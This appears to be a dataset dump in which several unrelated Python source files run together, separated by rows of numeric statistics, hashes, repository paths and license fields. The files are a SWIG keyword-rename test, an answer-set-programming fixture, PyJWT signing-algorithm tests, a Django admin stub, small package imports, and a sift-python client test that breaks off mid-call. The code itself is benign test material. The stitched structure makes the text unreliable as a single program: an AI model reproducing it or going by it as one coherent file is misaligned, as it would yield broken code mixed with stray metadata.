#!/usr/bin/env python
# Runtime test for SWIG's keyword renaming: C identifiers that collide with
# Python keywords ("in", "except") are exposed with a leading underscore.
import keyword_rename
# Call each renamed function positionally and via its renamed keyword
# argument to confirm the parameter names were rewritten as well.
keyword_rename._in(1)
keyword_rename._in(_except=1)
keyword_rename._except(1)
keyword_rename._except(_in=1)
| 21.714286
| 29
| 0.822368
| 25
| 152
| 4.56
| 0.4
| 0.570175
| 0.368421
| 0.350877
| 0.403509
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027778
| 0.052632
| 152
| 6
| 30
| 25.333333
| 0.763889
| 0.131579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.2
| 0
| 0.2
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
04231e87c099348d8119eb313bea9caff1f09251
| 82
|
py
|
Python
|
tests/asp/gringo/modelchecker.016.test.py
|
bernardocuteri/wasp
|
05c8f961776dbdbf7afbf905ee00fc262eba51ad
|
[
"Apache-2.0"
] | 19
|
2015-12-03T08:53:45.000Z
|
2022-03-31T02:09:43.000Z
|
tests/asp/gringo/modelchecker.016.test.py
|
bernardocuteri/wasp
|
05c8f961776dbdbf7afbf905ee00fc262eba51ad
|
[
"Apache-2.0"
] | 80
|
2017-11-25T07:57:32.000Z
|
2018-06-10T19:03:30.000Z
|
tests/asp/gringo/modelchecker.016.test.py
|
bernardocuteri/wasp
|
05c8f961776dbdbf7afbf905ee00fc262eba51ad
|
[
"Apache-2.0"
] | 6
|
2015-01-15T07:51:48.000Z
|
2020-06-18T14:47:48.000Z
|
# Fixture for a model-checker regression test: `input` holds the ASP program
# fed to the solver and `output` the expected answer sets.
# NOTE(review): the names `input` (shadows the builtin) and `output` are
# presumably looked up by name by the test harness, so they must not change.
input = """
c | d.
a | b :- c.
a :- b.
b :- a.
"""
output = """
{d}
{c, a, b}
"""
| 7.454545
| 12
| 0.292683
| 15
| 82
| 1.6
| 0.4
| 0.25
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.317073
| 82
| 10
| 13
| 8.2
| 0.428571
| 0
| 0
| 0.2
| 0
| 0
| 0.621951
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f0cf39429c93e9e2b16ab221fc081d560b484e4c
| 10,512
|
py
|
Python
|
tests/contrib/test_algorithms.py
|
GeoffRichards/pyjwt
|
ec17f67c54d2d6c91def8ced366a88a8c797b110
|
[
"MIT"
] | null | null | null |
tests/contrib/test_algorithms.py
|
GeoffRichards/pyjwt
|
ec17f67c54d2d6c91def8ced366a88a8c797b110
|
[
"MIT"
] | null | null | null |
tests/contrib/test_algorithms.py
|
GeoffRichards/pyjwt
|
ec17f67c54d2d6c91def8ced366a88a8c797b110
|
[
"MIT"
] | null | null | null |
import base64
import pytest
from jwt.utils import force_bytes, force_unicode
from ..utils import key_path
# Optional back-ends: probe each contrib algorithm implementation and record
# its availability so the test classes below can be skipped cleanly.
try:
    from jwt.contrib.algorithms.pycrypto import RSAAlgorithm
except ImportError:
    has_pycrypto = False
else:
    has_pycrypto = True

try:
    from jwt.contrib.algorithms.py_ecdsa import ECAlgorithm
except ImportError:
    has_ecdsa = False
else:
    has_ecdsa = True

try:
    from jwt.contrib.algorithms.py_ed25519 import Ed25519Algorithm
except ImportError:
    has_ed25519 = False
else:
    has_ed25519 = True
@pytest.mark.skipif(
    not has_pycrypto, reason="Not supported without PyCrypto library"
)
class TestPycryptoAlgorithms:
    """Tests for the PyCrypto-backed RSAAlgorithm contrib implementation.

    Key material is read from fixture files resolved by the project's
    key_path() helper.  The base64 blobs below are pre-computed RSA-SHA256
    signatures over the message "Hello World!" made with the testkey_rsa
    fixture key — do not reformat them.
    """
    def test_rsa_should_parse_pem_public_key(self):
        """prepare_key() accepts a PEM-encoded public key string."""
        algo = RSAAlgorithm(RSAAlgorithm.SHA256)
        with open(key_path("testkey2_rsa.pub.pem")) as pem_key:
            algo.prepare_key(pem_key.read())
    def test_rsa_should_accept_unicode_key(self):
        """prepare_key() accepts a unicode (text) key, not only bytes."""
        algo = RSAAlgorithm(RSAAlgorithm.SHA256)
        with open(key_path("testkey_rsa")) as rsa_key:
            algo.prepare_key(force_unicode(rsa_key.read()))
    def test_rsa_should_reject_non_string_key(self):
        """prepare_key() raises TypeError for non-string input."""
        algo = RSAAlgorithm(RSAAlgorithm.SHA256)
        with pytest.raises(TypeError):
            algo.prepare_key(None)
    def test_rsa_sign_should_generate_correct_signature_value(self):
        """sign() runs without error and the canned signature verifies."""
        algo = RSAAlgorithm(RSAAlgorithm.SHA256)
        jwt_message = force_bytes("Hello World!")
        expected_sig = base64.b64decode(
            force_bytes(
                "yS6zk9DBkuGTtcBzLUzSpo9gGJxJFOGvUqN01iLhWHrzBQ9ZEz3+Ae38AXp"
                "10RWwscp42ySC85Z6zoN67yGkLNWnfmCZSEv+xqELGEvBJvciOKsrhiObUl"
                "2mveSc1oeO/2ujkGDkkkJ2epn0YliacVjZF5+/uDmImUfAAj8lzjnHlzYix"
                "sn5jGz1H07jYYbi9diixN8IUhXeTafwFg02IcONhum29V40Wu6O5tAKWlJX"
                "fHJnNUzAEUOXS0WahHVb57D30pcgIji9z923q90p5c7E2cU8V+E1qe8NdCA"
                "APCDzZZ9zQ/dgcMVaBrGrgimrcLbPjueOKFgSO+SSjIElKA=="
            )
        )
        with open(key_path("testkey_rsa")) as keyfile:
            jwt_key = algo.prepare_key(keyfile.read())
        with open(key_path("testkey_rsa.pub")) as keyfile:
            jwt_pub_key = algo.prepare_key(keyfile.read())
        # sign()'s return value is deliberately discarded — the assertion
        # checks the pre-computed signature; sign() is exercised for errors.
        algo.sign(jwt_message, jwt_key)
        result = algo.verify(jwt_message, jwt_pub_key, expected_sig)
        assert result
    def test_rsa_verify_should_return_false_if_signature_invalid(self):
        """Corrupting the signature makes verify() return False."""
        algo = RSAAlgorithm(RSAAlgorithm.SHA256)
        jwt_message = force_bytes("Hello World!")
        jwt_sig = base64.b64decode(
            force_bytes(
                "yS6zk9DBkuGTtcBzLUzSpo9gGJxJFOGvUqN01iLhWHrzBQ9ZEz3+Ae38AXp"
                "10RWwscp42ySC85Z6zoN67yGkLNWnfmCZSEv+xqELGEvBJvciOKsrhiObUl"
                "2mveSc1oeO/2ujkGDkkkJ2epn0YliacVjZF5+/uDmImUfAAj8lzjnHlzYix"
                "sn5jGz1H07jYYbi9diixN8IUhXeTafwFg02IcONhum29V40Wu6O5tAKWlJX"
                "fHJnNUzAEUOXS0WahHVb57D30pcgIji9z923q90p5c7E2cU8V+E1qe8NdCA"
                "APCDzZZ9zQ/dgcMVaBrGrgimrcLbPjueOKFgSO+SSjIElKA=="
            )
        )
        jwt_sig += force_bytes("123")  # Signature is now invalid
        with open(key_path("testkey_rsa.pub")) as keyfile:
            jwt_pub_key = algo.prepare_key(keyfile.read())
        result = algo.verify(jwt_message, jwt_pub_key, jwt_sig)
        assert not result
    def test_rsa_verify_should_return_true_if_signature_valid(self):
        """The canned signature verifies against the fixture public key."""
        algo = RSAAlgorithm(RSAAlgorithm.SHA256)
        jwt_message = force_bytes("Hello World!")
        jwt_sig = base64.b64decode(
            force_bytes(
                "yS6zk9DBkuGTtcBzLUzSpo9gGJxJFOGvUqN01iLhWHrzBQ9ZEz3+Ae38AXp"
                "10RWwscp42ySC85Z6zoN67yGkLNWnfmCZSEv+xqELGEvBJvciOKsrhiObUl"
                "2mveSc1oeO/2ujkGDkkkJ2epn0YliacVjZF5+/uDmImUfAAj8lzjnHlzYix"
                "sn5jGz1H07jYYbi9diixN8IUhXeTafwFg02IcONhum29V40Wu6O5tAKWlJX"
                "fHJnNUzAEUOXS0WahHVb57D30pcgIji9z923q90p5c7E2cU8V+E1qe8NdCA"
                "APCDzZZ9zQ/dgcMVaBrGrgimrcLbPjueOKFgSO+SSjIElKA=="
            )
        )
        with open(key_path("testkey_rsa.pub")) as keyfile:
            jwt_pub_key = algo.prepare_key(keyfile.read())
        result = algo.verify(jwt_message, jwt_pub_key, jwt_sig)
        assert result
    def test_rsa_prepare_key_should_be_idempotent(self):
        """prepare_key() applied to an already-prepared key is a no-op."""
        algo = RSAAlgorithm(RSAAlgorithm.SHA256)
        with open(key_path("testkey_rsa.pub")) as keyfile:
            jwt_pub_key_first = algo.prepare_key(keyfile.read())
            jwt_pub_key_second = algo.prepare_key(jwt_pub_key_first)
        assert jwt_pub_key_first == jwt_pub_key_second
@pytest.mark.skipif(
    not has_ecdsa, reason="Not supported without ecdsa library"
)
class TestEcdsaAlgorithms:
    """Tests for the ecdsa-backed ECAlgorithm contrib implementation.

    The base64 blob below is a pre-computed ECDSA-SHA256 signature over the
    message "Hello World!" made with the testkey_ec fixture key — do not
    reformat it.
    """
    def test_ec_should_reject_non_string_key(self):
        """prepare_key() raises TypeError for non-string input."""
        algo = ECAlgorithm(ECAlgorithm.SHA256)
        with pytest.raises(TypeError):
            algo.prepare_key(None)
    def test_ec_should_accept_unicode_key(self):
        """prepare_key() accepts a unicode (text) key, not only bytes."""
        algo = ECAlgorithm(ECAlgorithm.SHA256)
        with open(key_path("testkey_ec")) as ec_key:
            algo.prepare_key(force_unicode(ec_key.read()))
    def test_ec_sign_should_generate_correct_signature_value(self):
        """sign() runs without error and the canned signature verifies."""
        algo = ECAlgorithm(ECAlgorithm.SHA256)
        jwt_message = force_bytes("Hello World!")
        expected_sig = base64.b64decode(
            force_bytes(
                "AC+m4Jf/xI3guAC6w0w37t5zRpSCF6F4udEz5LiMiTIjCS4vcVe6dDOxK+M"
                "mvkF8PxJuvqxP2CO3TR3okDPCl/NjATTO1jE+qBZ966CRQSSzcCM+tzcHzw"
                "LZS5kbvKu0Acd/K6Ol2/W3B1NeV5F/gjvZn/jOwaLgWEUYsg0o4XVrAg65"
            )
        )
        with open(key_path("testkey_ec")) as keyfile:
            jwt_key = algo.prepare_key(keyfile.read())
        with open(key_path("testkey_ec.pub")) as keyfile:
            jwt_pub_key = algo.prepare_key(keyfile.read())
        # sign()'s return value is deliberately discarded — the assertion
        # checks the pre-computed signature; sign() is exercised for errors.
        algo.sign(jwt_message, jwt_key)
        result = algo.verify(jwt_message, jwt_pub_key, expected_sig)
        assert result
    def test_ec_verify_should_return_false_if_signature_invalid(self):
        """Corrupting the signature makes verify() return False."""
        algo = ECAlgorithm(ECAlgorithm.SHA256)
        jwt_message = force_bytes("Hello World!")
        jwt_sig = base64.b64decode(
            force_bytes(
                "AC+m4Jf/xI3guAC6w0w37t5zRpSCF6F4udEz5LiMiTIjCS4vcVe6dDOxK+M"
                "mvkF8PxJuvqxP2CO3TR3okDPCl/NjATTO1jE+qBZ966CRQSSzcCM+tzcHzw"
                "LZS5kbvKu0Acd/K6Ol2/W3B1NeV5F/gjvZn/jOwaLgWEUYsg0o4XVrAg65"
            )
        )
        jwt_sig += force_bytes("123")  # Signature is now invalid
        with open(key_path("testkey_ec.pub")) as keyfile:
            jwt_pub_key = algo.prepare_key(keyfile.read())
        result = algo.verify(jwt_message, jwt_pub_key, jwt_sig)
        assert not result
    def test_ec_verify_should_return_true_if_signature_valid(self):
        """The canned signature verifies against the fixture public key."""
        algo = ECAlgorithm(ECAlgorithm.SHA256)
        jwt_message = force_bytes("Hello World!")
        jwt_sig = base64.b64decode(
            force_bytes(
                "AC+m4Jf/xI3guAC6w0w37t5zRpSCF6F4udEz5LiMiTIjCS4vcVe6dDOxK+M"
                "mvkF8PxJuvqxP2CO3TR3okDPCl/NjATTO1jE+qBZ966CRQSSzcCM+tzcHzw"
                "LZS5kbvKu0Acd/K6Ol2/W3B1NeV5F/gjvZn/jOwaLgWEUYsg0o4XVrAg65"
            )
        )
        with open(key_path("testkey_ec.pub")) as keyfile:
            jwt_pub_key = algo.prepare_key(keyfile.read())
        result = algo.verify(jwt_message, jwt_pub_key, jwt_sig)
        assert result
    def test_ec_prepare_key_should_be_idempotent(self):
        """prepare_key() applied to an already-prepared key is a no-op."""
        algo = ECAlgorithm(ECAlgorithm.SHA256)
        with open(key_path("testkey_ec.pub")) as keyfile:
            jwt_pub_key_first = algo.prepare_key(keyfile.read())
            jwt_pub_key_second = algo.prepare_key(jwt_pub_key_first)
        assert jwt_pub_key_first == jwt_pub_key_second
@pytest.mark.skipif(
    not has_ed25519, reason="Not supported without cryptography>=2.6 library"
)
class TestEd25519Algorithms:
    """Tests for the cryptography-backed Ed25519Algorithm contrib implementation.

    hello_world_sig is a pre-computed Ed25519 signature over "Hello World!"
    made with the testkey_ed25519 fixture key.
    """
    hello_world_sig = "Qxa47mk/azzUgmY2StAOguAd4P7YBLpyCfU3JdbaiWnXM4o4WibXwmIHvNYgN3frtE2fcyd8OYEaOiD/KiwkCg=="
    hello_world = force_bytes("Hello World!")
    def test_ed25519_should_reject_non_string_key(self):
        """None is rejected with TypeError while real key files are accepted."""
        algo = Ed25519Algorithm()
        with pytest.raises(TypeError):
            algo.prepare_key(None)
        for fixture in ("testkey_ed25519", "testkey_ed25519.pub"):
            with open(key_path(fixture)) as fh:
                algo.prepare_key(fh.read())
    def test_ed25519_should_accept_unicode_key(self):
        """prepare_key() accepts a unicode (text) key, not only bytes."""
        algo = Ed25519Algorithm()
        with open(key_path("testkey_ed25519")) as fh:
            algo.prepare_key(force_unicode(fh.read()))
    def test_ed25519_sign_should_generate_correct_signature_value(self):
        """sign() runs without error and the canned signature verifies."""
        algo = Ed25519Algorithm()
        message = self.hello_world
        canned_sig = base64.b64decode(force_bytes(self.hello_world_sig))
        with open(key_path("testkey_ed25519")) as fh:
            signing_key = algo.prepare_key(fh.read())
        with open(key_path("testkey_ed25519.pub")) as fh:
            verify_key = algo.prepare_key(fh.read())
        # sign()'s return value is deliberately discarded — the assertion
        # checks the pre-computed signature; sign() is exercised for errors.
        algo.sign(message, signing_key)
        assert algo.verify(message, verify_key, canned_sig)
    def test_ed25519_verify_should_return_false_if_signature_invalid(self):
        """Corrupting the signature makes verify() return False."""
        algo = Ed25519Algorithm()
        message = self.hello_world
        corrupted = base64.b64decode(force_bytes(self.hello_world_sig))
        corrupted += force_bytes("123")  # Signature is now invalid
        with open(key_path("testkey_ed25519.pub")) as fh:
            verify_key = algo.prepare_key(fh.read())
        assert not algo.verify(message, verify_key, corrupted)
    def test_ed25519_verify_should_return_true_if_signature_valid(self):
        """The canned signature verifies against the fixture public key."""
        algo = Ed25519Algorithm()
        message = self.hello_world
        good_sig = base64.b64decode(force_bytes(self.hello_world_sig))
        with open(key_path("testkey_ed25519.pub")) as fh:
            verify_key = algo.prepare_key(fh.read())
        assert algo.verify(message, verify_key, good_sig)
    def test_ed25519_prepare_key_should_be_idempotent(self):
        """prepare_key() applied to an already-prepared key is a no-op."""
        algo = Ed25519Algorithm()
        with open(key_path("testkey_ed25519.pub")) as fh:
            prepared_once = algo.prepare_key(fh.read())
        prepared_twice = algo.prepare_key(prepared_once)
        assert prepared_once == prepared_twice
| 35.04
| 112
| 0.688642
| 1,152
| 10,512
| 5.953993
| 0.105035
| 0.028867
| 0.043301
| 0.045925
| 0.888468
| 0.878991
| 0.859309
| 0.808573
| 0.771541
| 0.725762
| 0
| 0.061101
| 0.230879
| 10,512
| 299
| 113
| 35.157191
| 0.78726
| 0.00704
| 0
| 0.698113
| 0
| 0
| 0.208837
| 0.157945
| 0
| 0
| 0
| 0
| 0.056604
| 1
| 0.089623
| false
| 0
| 0.04717
| 0
| 0.160377
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f0e5b02f56e865ced4cd2a59e2fd6e5f868cad09
| 146
|
py
|
Python
|
client_wishlist/customers/admin.py
|
EVolpert/client_whishlist
|
b2da64a53e978bc77bc4fb9a8c9b9dc4af66c5b1
|
[
"CC0-1.0"
] | null | null | null |
client_wishlist/customers/admin.py
|
EVolpert/client_whishlist
|
b2da64a53e978bc77bc4fb9a8c9b9dc4af66c5b1
|
[
"CC0-1.0"
] | 5
|
2021-03-30T14:20:02.000Z
|
2021-09-22T19:29:15.000Z
|
client_wishlist/customers/admin.py
|
EVolpert/client_whishlist
|
b2da64a53e978bc77bc4fb9a8c9b9dc4af66c5b1
|
[
"CC0-1.0"
] | 1
|
2020-08-18T16:35:12.000Z
|
2020-08-18T16:35:12.000Z
|
from django.contrib import admin
from customers.models import Customer
@admin.register(Customer)
class CustomerAdmin(admin.ModelAdmin):
    """Expose the Customer model in the Django admin with default options."""
    pass
| 20.857143
| 38
| 0.815068
| 18
| 146
| 6.611111
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116438
| 146
| 7
| 39
| 20.857143
| 0.922481
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.4
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
0b10f714d2e6e68f9180c75d1a5b01bd5eb32248
| 19
|
py
|
Python
|
app/models/__init__.py
|
jscottcronin/recommender_deployed
|
6579e751e368c0478020bd15cbf1f98bc99a14e9
|
[
"MIT"
] | 1
|
2018-04-24T17:25:39.000Z
|
2018-04-24T17:25:39.000Z
|
app/models/__init__.py
|
jscottcronin/recommender_deployed
|
6579e751e368c0478020bd15cbf1f98bc99a14e9
|
[
"MIT"
] | null | null | null |
app/models/__init__.py
|
jscottcronin/recommender_deployed
|
6579e751e368c0478020bd15cbf1f98bc99a14e9
|
[
"MIT"
] | null | null | null |
from .fm import FM
| 9.5
| 18
| 0.736842
| 4
| 19
| 3.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 19
| 1
| 19
| 19
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
9bc2489c04f09d77214a76e5db78d5ccd66ea68a
| 34
|
py
|
Python
|
api/__init__.py
|
ticet11/AbBOT-api
|
355bcf19a18a12692f544c9d968637681597d6ba
|
[
"MIT"
] | 11
|
2021-09-04T02:24:38.000Z
|
2022-02-28T19:03:44.000Z
|
api/__init__.py
|
ramblingjordan/AbBOT-api
|
36217744444629ecdb134e01fe838e8eea92d4bf
|
[
"MIT"
] | 12
|
2021-09-04T15:15:04.000Z
|
2021-09-20T22:07:27.000Z
|
api/__init__.py
|
ticet11/AbBOT-api
|
355bcf19a18a12692f544c9d968637681597d6ba
|
[
"MIT"
] | 11
|
2021-09-04T02:25:53.000Z
|
2021-09-06T15:50:56.000Z
|
from .server import start_server
| 17
| 33
| 0.823529
| 5
| 34
| 5.4
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.147059
| 34
| 1
| 34
| 34
| 0.931034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5019523e9735ebef1ed9ba94ec8b5edd4bf93212
| 33
|
py
|
Python
|
trunk/VyPy/optimize/Remember.py
|
jiaxu825/VyPy
|
47100bad9dea46f12cb8bfa1ba86886e06f5c85d
|
[
"BSD-3-Clause"
] | 3
|
2015-01-22T02:03:14.000Z
|
2022-03-15T21:50:50.000Z
|
trunk/VyPy/optimize/Remember.py
|
jiaxu825/VyPy
|
47100bad9dea46f12cb8bfa1ba86886e06f5c85d
|
[
"BSD-3-Clause"
] | 3
|
2015-02-06T19:12:04.000Z
|
2015-05-01T10:04:12.000Z
|
trunk/VyPy/optimize/Remember.py
|
jiaxu825/VyPy
|
47100bad9dea46f12cb8bfa1ba86886e06f5c85d
|
[
"BSD-3-Clause"
] | 1
|
2020-09-25T13:26:54.000Z
|
2020-09-25T13:26:54.000Z
|
from ..parallel import Remember
| 16.5
| 31
| 0.787879
| 4
| 33
| 6.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151515
| 33
| 2
| 31
| 16.5
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5042a06143047456fa02c483ab55d867a33a9b87
| 50,254
|
py
|
Python
|
tests/test_client.py
|
jyothish6190/sift-python
|
a3dbfc5f043e4992ed6aa977da579fab49001cb4
|
[
"MIT"
] | null | null | null |
tests/test_client.py
|
jyothish6190/sift-python
|
a3dbfc5f043e4992ed6aa977da579fab49001cb4
|
[
"MIT"
] | null | null | null |
tests/test_client.py
|
jyothish6190/sift-python
|
a3dbfc5f043e4992ed6aa977da579fab49001cb4
|
[
"MIT"
] | null | null | null |
import datetime
import json
import sys
import time
import unittest
import warnings

import mock
import requests.exceptions
import sift
# Python 2/3 compatibility: on Python 3 the quoting helpers moved into
# urllib.parse, so alias it under the old name; later code can then refer
# to a single `urllib` regardless of interpreter version.
if sys.version_info[0] < 3:
    import urllib
else:
    import urllib.parse as urllib
def valid_transaction_properties():
    """Return a representative, well-formed $transaction event payload.

    Used throughout the client tests as the canonical "good input" for
    track() calls.  $time is the current Unix timestamp in whole seconds.
    """
    return {
        '$buyer_user_id': '123456',
        '$seller_user_id': '654321',
        '$amount': 1253200,
        '$currency_code': 'USD',
        # int(time.time()) is portable; the previous
        # datetime.now().strftime('%s') relied on a glibc-only extension
        # ('%s' is not a standard strftime directive) and breaks on Windows.
        '$time': int(time.time()),
        '$transaction_id': 'my_transaction_id',
        '$billing_name': 'Mike Snow',
        '$billing_bin': '411111',
        '$billing_last4': '1111',
        '$billing_address1': '123 Main St.',
        '$billing_city': 'San Francisco',
        '$billing_region': 'CA',
        '$billing_country': 'US',
        '$billing_zip': '94131',
        '$user_email': 'mike@example.com'
    }
def valid_label_properties():
    """Return a well-formed payload for the user-labelling endpoints."""
    properties = {}
    properties['$abuse_type'] = 'content_abuse'
    properties['$is_bad'] = True
    properties['$description'] = 'Listed a fake item'
    properties['$source'] = 'Internal Review Queue'
    properties['$analyst'] = 'super.sleuth@example.com'
    return properties
def score_response_json():
    """Return a canned /score API response body as raw JSON text.

    Carries the legacy top-level `score` and `latest_label` alongside the
    per-abuse-type `scores` and `latest_labels` maps, so tests exercise
    both parsing paths.
    """
    return """{
"status": 0,
"error_message": "OK",
"user_id": "12345",
"score": 0.85,
"latest_label": {
"is_bad": true,
"time": 1450201660000
},
"scores": {
"content_abuse": {
"score": 0.14
},
"payment_abuse": {
"score": 0.97
}
},
"latest_labels": {
"promotion_abuse": {
"is_bad": false,
"time": 1457201099000
},
"payment_abuse": {
"is_bad": true,
"time": 1457212345000
}
}
}"""
# A sample response from the /{version}/users/{userId}/score API.
# Reused by the get_user_score/rescore_user tests; unlike the legacy /score
# body it identifies the entity via entity_type/entity_id and includes
# latest_decisions.
USER_SCORE_RESPONSE_JSON = """{
"status": 0,
"error_message": "OK",
"entity_type": "user",
"entity_id": "12345",
"scores": {
"content_abuse": {
"score": 0.14
},
"payment_abuse": {
"score": 0.97
}
},
"latest_decisions": {
"payment_abuse": {
"id": "user_looks_bad_payment_abuse",
"category": "block",
"source": "AUTOMATED_RULE",
"time": 1352201880,
"description": "Bad Fraudster"
}
},
"latest_labels": {
"promotion_abuse": {
"is_bad": false,
"time": 1457201099000
},
"payment_abuse": {
"is_bad": true,
"time": 1457212345000
}
}
}"""
def action_response_json():
    """Return a canned synchronous-actions response body as raw JSON text.

    Same shape as score_response_json() plus a top-level `actions` array
    describing the triggered action, its entity, and its triggers.
    """
    return """{
"actions": [
{
"action": {
"id": "freds_action"
},
"entity": {
"id": "Fred"
},
"id": "ACTION1234567890:freds_action",
"triggers": [
{
"source": "synchronous_action",
"trigger": {
"id": "TRIGGER1234567890"
},
"type": "formula"
}
]
}
],
"score": 0.85,
"status": 0,
"error_message": "OK",
"user_id": "Fred",
"scores": {
"content_abuse": {
"score": 0.14
},
"payment_abuse": {
"score": 0.97
}
},
"latest_labels": {
"promotion_abuse": {
"is_bad": false,
"time": 1457201099000
},
"payment_abuse": {
"is_bad": true,
"time": 1457212345000
}
}
}"""
def response_with_data_header():
    """Headers marking a mocked HTTP response body as UTF-8 JSON."""
    json_content_type = 'application/json; charset=UTF-8'
    return {'content-type': json_content_type}
class TestSiftPythonClient(unittest.TestCase):
def setUp(self):
self.test_key = 'a_fake_test_api_key'
self.account_id = 'ACCT'
self.sift_client = sift.Client(api_key=self.test_key, account_id=self.account_id)
def test_global_api_key(self):
# test for error if global key is undefined
self.assertRaises(TypeError, sift.Client)
sift.api_key = "a_test_global_api_key"
local_api_key = "a_test_local_api_key"
client1 = sift.Client()
client2 = sift.Client(local_api_key)
# test that global api key is assigned
assert(client1.api_key == sift.api_key)
# test that local api key is assigned
assert(client2.api_key == local_api_key)
client2 = sift.Client()
# test that client2 is assigned a new object with global api_key
assert(client2.api_key == sift.api_key)
def test_constructor_requires_valid_api_key(self):
self.assertRaises(TypeError, sift.Client, None)
self.assertRaises(ValueError, sift.Client, '')
def test_constructor_invalid_api_url(self):
self.assertRaises(TypeError, sift.Client, self.test_key, None)
self.assertRaises(ValueError, sift.Client, self.test_key, '')
def test_constructor_api_key(self):
client = sift.Client(self.test_key)
self.assertEqual(client.api_key, self.test_key)
def test_track_requires_valid_event(self):
self.assertRaises(TypeError, self.sift_client.track, None, {})
self.assertRaises(ValueError, self.sift_client.track, '', {})
self.assertRaises(TypeError, self.sift_client.track, 42, {})
def test_track_requires_properties(self):
event = 'custom_event'
self.assertRaises(TypeError, self.sift_client.track, event, None)
self.assertRaises(TypeError, self.sift_client.track, event, 42)
self.assertRaises(ValueError, self.sift_client.track, event, {})
def test_score_requires_user_id(self):
self.assertRaises(TypeError, self.sift_client.score, None)
self.assertRaises(ValueError, self.sift_client.score, '')
self.assertRaises(TypeError, self.sift_client.score, 42)
def test_event_ok(self):
event = '$transaction'
mock_response = mock.Mock()
mock_response.content = '{"status": 0, "error_message": "OK"}'
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'post') as mock_post:
mock_post.return_value = mock_response
response = self.sift_client.track(event, valid_transaction_properties())
mock_post.assert_called_with(
'https://api.siftscience.com/v205/events',
data=mock.ANY,
headers=mock.ANY,
timeout=mock.ANY,
params={})
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.api_status == 0)
assert(response.api_error_message == "OK")
def test_event_with_timeout_param_ok(self):
event = '$transaction'
test_timeout = 5
mock_response = mock.Mock()
mock_response.content = '{"status": 0, "error_message": "OK"}'
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'post') as mock_post:
mock_post.return_value = mock_response
response = self.sift_client.track(
event, valid_transaction_properties(), timeout=test_timeout)
mock_post.assert_called_with(
'https://api.siftscience.com/v205/events',
data=mock.ANY,
headers=mock.ANY,
timeout=test_timeout,
params={})
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.api_status == 0)
assert(response.api_error_message == "OK")
def test_score_ok(self):
mock_response = mock.Mock()
mock_response.content = score_response_json()
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'get') as mock_get:
mock_get.return_value = mock_response
response = self.sift_client.score('12345')
mock_get.assert_called_with(
